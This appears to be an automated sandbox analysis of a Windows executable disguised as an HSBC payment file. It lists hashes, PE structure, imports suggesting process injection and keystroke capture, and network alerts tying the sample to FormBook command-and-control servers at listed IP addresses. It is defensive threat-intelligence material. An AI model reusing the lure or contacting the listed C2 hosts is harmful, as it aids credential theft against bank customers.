                                                                                                                              Preview:x..a.4JD2...^.....Q0...l1M..2SXN5JQ384JD2E5FW2SXN5JQ384JD2.5FW<L.@5.X...K..da.>As(<Z-#RU.)%\+Z2wP6x<@$qZV...aeX)3W}UC?nQ384JD2<4O..3?..*6..T-.(.mR4.T...XS.^...z7U..'V"lS_.JD2E5FW2..N5.P28>.hE5FW2SXN.JS235AD2.1FW2SXN5JQ.)4JD"E5F76SXNuJQ#84JF2E3FW2SXN5LQ384JD2EUBW2QXN5JQ3:4..2E%FW"SXN5ZQ3(4JD2E5VW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JjF M2W2S,.1JQ#84J.6E5VW2SXN5JQ384JD2e5F72SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2SXN5JQ384JD2E5FW2
                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                              Entropy (8bit):7.158998559059728
                                                                                                                              TrID:
                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                              File name:rHSBCBank_Paymentswiftcpy.exe
                                                                                                                              File size:1'179'648 bytes
                                                                                                                              MD5:6ba55b78696072ea7f7f56c955fe1c0b
                                                                                                                              SHA1:7f061f071b237e9defd98fbfdea99caebe97960d
                                                                                                                              SHA256:8771179cb6f0488244c65cdfab07668bfaea4d0b28a77ee94879448662fde67e
                                                                                                                              SHA512:4e498f3a5b56bc50d814b911adcb49c1edef3b7d236ed0d4a87ac79faa27a83abfe6c2a0fb1580f02ee873b74105aae2e2a85119785244f0e586cb18fceb99bf
                                                                                                                              SSDEEP:24576:Vu6J33O0c+JY5UZ+XC0kGso6FaDaEJaWntGitRmRvH4/T5upWY:3u0c++OCvkGs9FaDBvGiDU8VDY
                                                                                                                              TLSH:5745CF2273DDC360CB669173BF2AB7016EBF3C614630B95B2F980D7DA960161162D7A3
                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                                                                                              Icon Hash:aaf3e3e3938382a0
                                                                                                                              Entrypoint:0x427dcd
                                                                                                                              Entrypoint Section:.text
                                                                                                                              Digitally signed:false
                                                                                                                              Imagebase:0x400000
                                                                                                                              Subsystem:windows gui
                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                              Time Stamp:0x67170475 [Tue Oct 22 01:48:37 2024 UTC]
                                                                                                                              TLS Callbacks:
                                                                                                                              CLR (.Net) Version:
                                                                                                                              OS Version Major:5
                                                                                                                              OS Version Minor:1
                                                                                                                              File Version Major:5
                                                                                                                              File Version Minor:1
                                                                                                                              Subsystem Version Major:5
                                                                                                                              Subsystem Version Minor:1
                                                                                                                              Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                                                                                              Instruction
                                                                                                                              call 00007FCDC0F6D5EAh
                                                                                                                              jmp 00007FCDC0F603B4h
                                                                                                                              int3
                                                                                                                              int3
                                                                                                                              int3
                                                                                                                              int3
                                                                                                                              int3
                                                                                                                              int3
                                                                                                                              int3
                                                                                                                              int3
                                                                                                                              int3
                                                                                                                              push edi
                                                                                                                              push esi
                                                                                                                              mov esi, dword ptr [esp+10h]
                                                                                                                              mov ecx, dword ptr [esp+14h]
                                                                                                                              mov edi, dword ptr [esp+0Ch]
                                                                                                                              mov eax, ecx
                                                                                                                              mov edx, ecx
                                                                                                                              add eax, esi
                                                                                                                              cmp edi, esi
                                                                                                                              jbe 00007FCDC0F6053Ah
                                                                                                                              cmp edi, eax
                                                                                                                              jc 00007FCDC0F6089Eh
                                                                                                                              bt dword ptr [004C31FCh], 01h
                                                                                                                              jnc 00007FCDC0F60539h
                                                                                                                              rep movsb
                                                                                                                              jmp 00007FCDC0F6084Ch
                                                                                                                              cmp ecx, 00000080h
                                                                                                                              jc 00007FCDC0F60704h
                                                                                                                              mov eax, edi
                                                                                                                              xor eax, esi
                                                                                                                              test eax, 0000000Fh
                                                                                                                              jne 00007FCDC0F60540h
                                                                                                                              bt dword ptr [004BE324h], 01h
                                                                                                                              jc 00007FCDC0F60A10h
                                                                                                                              bt dword ptr [004C31FCh], 00000000h
                                                                                                                              jnc 00007FCDC0F606DDh
                                                                                                                              test edi, 00000003h
                                                                                                                              jne 00007FCDC0F606EEh
                                                                                                                              test esi, 00000003h
                                                                                                                              jne 00007FCDC0F606CDh
                                                                                                                              bt edi, 02h
                                                                                                                              jnc 00007FCDC0F6053Fh
                                                                                                                              mov eax, dword ptr [esi]
                                                                                                                              sub ecx, 04h
                                                                                                                              lea esi, dword ptr [esi+04h]
                                                                                                                              mov dword ptr [edi], eax
                                                                                                                              lea edi, dword ptr [edi+04h]
                                                                                                                              bt edi, 03h
                                                                                                                              jnc 00007FCDC0F60543h
                                                                                                                              movq xmm1, qword ptr [esi]
                                                                                                                              sub ecx, 08h
                                                                                                                              lea esi, dword ptr [esi+08h]
                                                                                                                              movq qword ptr [edi], xmm1
                                                                                                                              lea edi, dword ptr [edi+08h]
                                                                                                                              test esi, 00000007h
                                                                                                                              je 00007FCDC0F60595h
                                                                                                                              bt esi, 03h
                                                                                                                              jnc 00007FCDC0F605E8h
                                                                                                                              Programming Language:
                                                                                                                              • [ASM] VS2013 build 21005
                                                                                                                              • [ C ] VS2013 build 21005
                                                                                                                              • [C++] VS2013 build 21005
                                                                                                                              • [ C ] VS2008 SP1 build 30729
                                                                                                                              • [IMP] VS2008 SP1 build 30729
                                                                                                                              • [ASM] VS2013 UPD4 build 31101
                                                                                                                              • [RES] VS2013 build 21005
                                                                                                                              • [LNK] VS2013 UPD4 build 31101
                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x576a0.rsrc
                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x11f0000x711c.reloc
                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                              .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                              .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                              .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                              .rsrc0xc70000x576a00x578003869490ae3a964afe8bd1628566a7b5dFalse0.92431640625data7.888049955318111IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                              .reloc0x11f0000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                              RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                              RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                              RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                              RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                                                              RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                                                              RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                                                              RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                                                              RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                                                              RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                                                              RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                                                              RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                                                              RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                                                                                              RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                                                              RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                                                                                              RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                                                              RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                              RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                              RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                                                              RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                                              RT_RCDATA0xcf7b80x4e965data1.000329301973016
                                                                                                                              RT_GROUP_ICON0x11e1200x76dataEnglishGreat Britain0.6610169491525424
                                                                                                                              RT_GROUP_ICON0x11e1980x14dataEnglishGreat Britain1.25
                                                                                                                              RT_GROUP_ICON0x11e1ac0x14dataEnglishGreat Britain1.15
                                                                                                                              RT_GROUP_ICON0x11e1c00x14dataEnglishGreat Britain1.25
                                                                                                                              RT_VERSION0x11e1d40xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                                              RT_MANIFEST0x11e2b00x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                                                                                              DLLImport
                                                                                                                              WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                                                                              VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                                                                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                              COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                                                              MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                                                              WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                                                                              PSAPI.DLLGetProcessMemoryInfo
                                                                                                                              IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                                                              USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                                                                              UxTheme.dllIsThemeActive
                                                                                                                              KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                                                                              USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                                                                              GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                                                                              COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                                                                              ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                                                                              SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                              ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                                                                              OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                              EnglishGreat Britain
                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                              2024-10-22T05:38:36.187115+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649868208.91.197.2780TCP
                                                                                                                              2024-10-22T05:39:08.255197+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649975198.44.251.20380TCP
                                                                                                                              2024-10-22T05:39:21.895109+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.64998081.2.196.1980TCP
                                                                                                                              2024-10-22T05:39:35.613850+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649984195.110.124.13380TCP
                                                                                                                              2024-10-22T05:39:49.438369+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.64998854.67.87.11080TCP
                                                                                                                              2024-10-22T05:40:07.806885+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649992199.59.243.22780TCP
                                                                                                                              2024-10-22T05:40:21.217859+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649996162.213.249.21680TCP
                                                                                                                              2024-10-22T05:40:36.679327+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650000221.121.144.14980TCP
                                                                                                                              2024-10-22T05:40:50.204838+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650004199.59.243.22780TCP
                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Oct 22, 2024 05:38:34.419610023 CEST4986880192.168.2.6208.91.197.27
                                                                                                                              Oct 22, 2024 05:38:34.425115108 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:34.425302029 CEST4986880192.168.2.6208.91.197.27
                                                                                                                              Oct 22, 2024 05:38:34.431626081 CEST4986880192.168.2.6208.91.197.27
                                                                                                                              Oct 22, 2024 05:38:34.437235117 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.186935902 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.186949015 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.186959982 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.186992884 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.187114954 CEST4986880192.168.2.6208.91.197.27
                                                                                                                              Oct 22, 2024 05:38:36.187145948 CEST4986880192.168.2.6208.91.197.27
                                                                                                                              Oct 22, 2024 05:38:36.194205999 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.194216013 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.194334030 CEST4986880192.168.2.6208.91.197.27
                                                                                                                              Oct 22, 2024 05:38:36.194470882 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.194482088 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.194490910 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.194544077 CEST4986880192.168.2.6208.91.197.27
                                                                                                                              Oct 22, 2024 05:38:36.201793909 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.201805115 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.202006102 CEST4986880192.168.2.6208.91.197.27
                                                                                                                              Oct 22, 2024 05:38:36.202035904 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.202044964 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.202059984 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.202080011 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.202256918 CEST4986880192.168.2.6208.91.197.27
                                                                                                                              Oct 22, 2024 05:38:36.202258110 CEST4986880192.168.2.6208.91.197.27
                                                                                                                              Oct 22, 2024 05:38:36.210387945 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.210397959 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.210412979 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.210421085 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.210479021 CEST4986880192.168.2.6208.91.197.27
                                                                                                                              Oct 22, 2024 05:38:36.210508108 CEST4986880192.168.2.6208.91.197.27
                                                                                                                              Oct 22, 2024 05:38:36.304172993 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.304189920 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.304197073 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.304203987 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.304447889 CEST4986880192.168.2.6208.91.197.27
                                                                                                                              Oct 22, 2024 05:38:36.311741114 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.311925888 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.311938047 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.312103987 CEST4986880192.168.2.6208.91.197.27
                                                                                                                              Oct 22, 2024 05:38:36.319585085 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.319593906 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.319603920 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.319745064 CEST4986880192.168.2.6208.91.197.27
                                                                                                                              Oct 22, 2024 05:38:36.319745064 CEST4986880192.168.2.6208.91.197.27
                                                                                                                              Oct 22, 2024 05:38:36.327796936 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.327806950 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.327816010 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.327936888 CEST4986880192.168.2.6208.91.197.27
                                                                                                                              Oct 22, 2024 05:38:36.368921041 CEST8049868208.91.197.27192.168.2.6
                                                                                                                              Oct 22, 2024 05:38:36.368953943 CEST8049868208.91.197.27192.168.2.6
